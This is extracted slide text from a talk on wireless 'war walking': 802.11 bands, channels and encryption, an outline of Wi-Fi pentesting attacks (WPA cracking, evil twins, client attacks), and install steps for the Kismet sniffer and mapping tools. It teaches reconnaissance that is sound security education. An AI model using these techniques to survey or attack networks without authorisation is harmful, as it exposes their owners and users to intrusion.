War Walking

by Nirav Goti
Who am I?
I am InfoSec guy...
Who is into Web, Thick client, Thin
client, IoT, wireless and Forensics.
Agenda ●
●
Wireless communication
Different types and bands of 802.11
● Wireless pentesting
● Wireless States
● 802.11 Terminologies
● War Walking
● Requirements
● Kismet
● Demo
Wireless Communication (802.11)
● Who defines the bandwidth.
○ ITU Radio Regulations.
● Modulations (ISM and UNII)
○ ISM - Industrial, scientific and medical:-
■ Radio bands reserved internationally for the use of radio
frequency energy for industrial, scientific and medical
purposes other than telecommunications.
○ UNII - Unlicensed National Information Infrastructure:-
■ Radio band is part of the radio frequency spectrum used by
IEEE 802.11a devices and by many wireless ISPs.
 Modulations (ISM and UNII)
ISM - Industrial, scientific and medical
● The entire spectrum is only 100 MHz wide. This means the 11 channels have to squeeze
into the 100 MHz available, and in the end, overlap.
● If going to use 40MHz channels, take into consideration that the airwaves may be
congested, unless you live in a house in the middle of a very large property.

Reference for more details

 Modulations (ISM and UNII)
ISM - Industrial, scientific and medical
● For 802.11 they are divided in 14 channels with 5 MHz difference and channel 14 with 12
MHz.
● Has only 3 non-overlapping channels (1, 6, 11) which operate on 22 MHz frequency.

Reference for more details

Modulations (ISM and UNII)
UNII - Unlicensed National Information Infrastructure
● It operates over four ranges: U-NII: 5.150–5.850 GHz
● Non-overlapping 20 MHz channels in the 5 GHz
● Divided in 4 parts:
Different types and bands of 802.11
● Modulations (ISM and UNII)
● 802.11 Standards and Bands
● Channels
● Cryptography
802.11 Standards and Bands
802.11x refers to a family of specifications developed by the IEEE for
WLAN.

There are four standards a, b, g and n in 802.11 over 2.5 GHz (ISM Band).

There are three standards ac, ad and af in 802.11 over 5 GHz (UNII Band).
802.11 Standards and Bands
ISM - Industrial, scientific and medical
802.11 Standards and Bands
UNII - Unlicensed National Information Infrastructure
Channels
A WiFi channel is the medium through which our wireless networks can
send and receive data.

Sending via channel pigeon Receiving

Channels
ISM - Industrial, scientific and medical
Channels
ISM - Industrial, scientific and medical
Channels
UNII - Unlicensed National Information Infrastructure
 802.11 Cryptography

Having an security protocol over the wireless is must due to the sensitive
information that is being conveyed through emails, banking applications,
payment gateways, etc.

Wireless security protocols were developed to protect home/business

WLANs.

These wireless security protocols include WEP, WPA, WPA2 and WPA3
each with their own strengths and weaknesses.
Reference for more info...
802.11 Cryptography
Wireless Pentesting
Scanning

Enumeration (Investigate rogue devices)

Testing the targeted APs

Gaining Access
Wireless Pentesting
● Bypassing WLAN Authentication – Shared Key, MAC Filtering, Hidden SSIDs
● Cracking WLAN Encryption – WEP, WPA/WPA2 Personal and Enterprise, Understanding
encryption based flaws (WEP,TKIP,CCMP)
● Attacking the WLAN Infrastructure – Rogues Devices, Evil Twins, DoS Attacks, MITM, Wi-
Fi Protected Setup
● Advanced Enterprise Attacks – 802.1x, EAP, LEAP, PEAP, EAP-TTLS
● Attacking the Wireless Client – Honeypots and Hotspot attacks, Caffe-Latte, Hirte, Ad-Hoc
Networks and Viral SSIDs, WiFishing
● Enterprise Wi-Fi Worms, Backdoors and Botnets
Wireless states
Access Point (AP): Continuously sends broadcasting beacons

Clients: Continuously probes from APs.

Authentication: Action of proving Legitimacy of ones proof for access

point.

Stations: Devices looking for open or pre-authorized APs.

802.11 Terminologies
BSSID: MAC address of the AP.

ESSID/SSID: Name of the network connected.

Signal Strength: Strength of the connection depending on distance and

obstacles.

Handshake: Authenticating agreement between Client and AP.

War Walking
When a person is walking within an infrastructure investigating the
wireless traffic then that process is called war walking.

This process will help you collect all the necessary details to raise a war
against the infrastructure via wireless telecommunication devices.
War Walking
War Walking
What is war driving?
What is war driving?
Requirements
ALFA card (Wireless adaptor)

Laptop / Raspberry Pi (kismet )

Note: (Only for 802.11 and 802.15)

Kismet
Kismet is a wireless sniffing tool.

It is by default available in Kali.

Uninstall it.
Kismet
Because the default kismet does not cover all the bases.

And
Kismet
Kismet
● git clone https://www.kismetwireless.net/git/kismet.git
● sudo apt-get install build-essential git libmicrohttpd-dev zlib1g-dev
libnl-3-dev libnl-genl-3-dev libcap-dev libpcap-dev libncurses5-dev
libnm-dev libdw-dev libsqlite3-dev protobuf-c-compiler libprotobuf-c-
dev libusb-1.0-0 libusb-1.0-0-dev protobuf-compiler
● cd kismet
● ./configure
● make
● sudo make suidinstall
● sudo usermod -a -G kismet <YourUsername>
Kismet
Kismet
● https://github.com/binkybear/kismet_web_viewer
○ pip install -r requirements.txt
○ Python app.py
● https://tools.kali.org/wireless-attacks/giskismet
○ giskismet -x Kismet-<blah-blah>.netxml
○ giskismet -q "SELECT * FROM wireless" -o all.kml
 Thank you!
Any Questions?